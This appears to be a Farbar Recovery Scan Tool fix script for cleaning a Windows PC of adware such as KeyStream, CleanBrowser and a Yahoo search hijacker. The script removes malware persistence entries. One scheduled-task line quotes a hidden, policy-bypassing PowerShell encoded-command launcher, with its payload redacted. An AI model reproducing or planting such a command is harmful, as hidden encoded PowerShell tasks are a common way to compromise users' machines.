cjoint

Document format: text/plain

Preview

start
CloseProcesses:
CreateRestorePoint:
(KeyStream) C:\ProgramData\KeyStream\KeyStream.exe
() C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
() C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
() C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\ProgramData\KeyStream\KeyStream.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-18\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
AppInit_DLLs: C:\ProgramData\KeyStream\DIWYSV64.dll => C:\ProgramData\KeyStream\DIWYSV64.dll [1096704 2016-01-06] (KeyStream)
AppInit_DLLs-x32: C:\ProgramData\KeyStream\DIWYSV32.dll => C:\ProgramData\KeyStream\DIWYSV32.dll [855552 2016-01-06] (KeyStream)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3782850899-4072569730-3814174056-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2SyEyBtC0C0AyDzzyEtGyBzy0C0FtG0B0EyD0BtGtC0F0AyBtG0DtC0E0EtBzy0F0AtCtA0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1048808242%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL =
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2SyEyBtC0C0AyDzzyEtGyBzy0C0FtG0B0EyD0BtGtC0F0AyBtG0DtC0E0EtBzy0F0AtCtA0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1048808242%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2SyEyBtC0C0AyDzzyEtGyBzy0C0FtG0B0EyD0BtGtC0F0AyBtG0DtC0E0EtBzy0F0AtCtA0Azz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1048808242%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_mdaffmarmarie_16_03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFyEtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0AtA0A0AtA0A0BtGyE0CtDtBtG0DyCtAzztGyCyEtD0DtGtD0E0FtCtAyBzzyCtCtB0B0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D870249007%26a%3Dwny_mdaffmarmarie_16_03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3782850899-4072569730-3814174056-1000 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ir_16_02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEzzyD0BtAzytCyCtAyC0DyEyCzytCzytN0D0Tzu0StCyEyByEtN1L2XzutAtFtCyBtFtBtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StD0EtDtC0DzyyByDtGyBtD0EzztGtD0AyC0AtGtByC0DtCtGtByCtDyBtDyD0E0Dzy0CtByD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtAtD0ByC0C0FyDtG0EyCyB0FtGyEzy0FtBtG0AyDtDyBtGtC0F0CtB0E0ByBzytAtC0F0F2QtN0A0LzutB%26cr%3D1583762996%26a%3Dwncy_ir_16_02%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
BHO-x32: Pas de nom -> {11111111-1111-1111-1111-110511161180} -> Pas de fichier
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - Pas de fichier
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - Pas de fichier
FF Plugin HKU\S-1-5-21-3782850899-4072569730-3814174056-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [Pas de fichier]
S3 NPF; system32\drivers\NPF.sys [X]
2016-01-22 22:08 - 2016-01-22 22:09 - 00000000 ____D C:\ProgramData\KeyStream
2016-01-22 00:37 - 2016-01-22 23:15 - 00000000 ____D C:\Users\brabant\AppData\Local\CleanBrowserApp
2016-01-22 00:37 - 2016-01-22 00:37 - 00002003 _____ C:\Users\brabant\Desktop\Clean Browser.lnk
2016-01-22 00:29 - 2016-01-23 09:29 - 00000000 ____D C:\Users\brabant\AppData\Roaming\CleanBrowser
2015-11-17 22:55 - 2015-11-17 22:55 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Snap.Do Engine (HKU\S-1-5-21-3782850899-4072569730-3814174056-1000\...\{81e3a207-38ac-4ac2-a3e0-004b95de0234}) (Version: 11.77.1.17697 - ReSoft Ltd.) <==== ATTENTION
Windows 7 Service Pack 1 Packages (HKU\S-1-5-21-3782850899-4072569730-3814174056-1000\...\Windows 7 Service Pack 1 Packages) (Version: - ) <==== ATTENTION
Task: {200752DD-647C-41D7-B240-D0DF2F5425C1} - System32\Tasks\AION NF Saturday => Firefox.exe hxxp://boost.games724.com/click/46ee8de2b00db54424612991a82654f9b8bfe10d8f4de7c775801389726b73c5?cp1=yEzzyD0BtAzytCyCtAyC0DyEyCzytCzy2RtBtDtCyCtDtCtBtBtBtBtCzztDyEtCyDtC <==== ATTENTION
Task: {2D1259E1-B25C-4F98-9140-5E7F3DE95FD6} - System32\Tasks\AION NF Sunday => Firefox.exe hxxp://boost.games724.com/click/46ee8de2b00db54424612991a82654f9b8bfe10d8f4de7c775801389726b73c5?cp1=yEzzyD0BtAzytCyCtAyC0DyEyCzytCzy2RtBtDtCyCtDtCtBtBtBtBtCzztDyEtCyDtC <==== ATTENTION
Task: {30F802CE-D6DF-4F38-9813-1973B8127ADF} - System32\Tasks\AION NS Sunday => Firefox.exe hxxp://boost.games724.com/click/46ee8de2b00db54424612991a82654f9b8bfe10d8f4de7c775801389726b73c5?cp1=yEzzyD0BtAzytCyCtAyC0DyEyCzytCzy2RtBtDtCyCtDtCtBtBtBtBtCzztDyEtCyDtC <==== ATTENTION
Task: {564ECD02-4182-4BFD-9CED-00190F45AED6} - System32\Tasks\{0E0F0F47-7879-0A05-0F11-047F7D051178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64 payload]
Task: {9AA0A834-4499-401C-BA61-C5397895B42E} - System32\Tasks\HZUMUR1 => C:\ProgramData\KeyStream\KeyStream.exe [2016-01-06] (KeyStream) <==== ATTENTION
Task: {CBB33372-5B0C-487B-85D2-41B6D6E1A56B} - \93d9d0c3-794c-44a9-bef3-375cc452721f-11 -> Pas de fichier <==== ATTENTION
Task: {D2C9F50F-6E88-45F4-9437-9555DFB54A73} - \bench-sys -> Pas de fichier <==== ATTENTION
Task: C:\WINDOWS\Tasks\HZUMUR1.job => C:\ProgramData\KeyStream\KeyStream.exe <==== ATTENTION
C:\WINDOWS\Tasks\HZUMUR1.job
2016-01-19 18:33 - 2016-01-19 18:33 - 00310272 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
2016-01-22 00:35 - 2016-01-22 00:35 - 46344704 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
2016-01-22 00:35 - 2016-01-22 00:35 - 01481728 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\libglesv2.dll
2016-01-22 00:35 - 2016-01-22 00:35 - 00073728 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\libegl.dll
AlternateDataStreams: C:\ProgramData\TEMP:2411B07C
AlternateDataStreams: C:\ProgramData\TEMP:2A8CD561
AlternateDataStreams: C:\ProgramData\TEMP:2E7188E9
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:49D0B9BB
AlternateDataStreams: C:\ProgramData\TEMP:5177EEE7
AlternateDataStreams: C:\ProgramData\TEMP:89CC7FD8
AlternateDataStreams: C:\ProgramData\TEMP:C59CBFB5
AlternateDataStreams: C:\ProgramData\TEMP:D1B5B4F1
AlternateDataStreams: C:\ProgramData\TEMP:D2BD489B
AlternateDataStreams: C:\ProgramData\TEMP:E8C4808B
AlternateDataStreams: C:\ProgramData\TEMP:EE56EBF6
AlternateDataStreams: C:\ProgramData\TEMP:F235E79C
AlternateDataStreams: C:\ProgramData\TEMP:F8CC1DFD


EmptyTemp:
end
